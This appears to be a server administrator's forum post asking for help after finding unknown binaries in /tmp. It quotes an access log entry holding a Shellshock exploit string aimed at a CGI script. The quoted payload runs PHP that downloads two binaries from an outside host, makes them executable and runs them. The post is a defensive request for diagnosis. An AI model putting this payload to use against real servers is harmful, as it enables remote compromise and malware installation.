We discovered binaries /tmp/susu1
and /tmp/susu2
and executed by the webserver user.
In the logs we have the following entries:
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
But we found only the error codes 301, 302, 403, 404, 500 of such requests. No 200er code which would indicate that the hack was successful.
Is this a common security problem? How can it be fixed? Or how can it be further tracked down?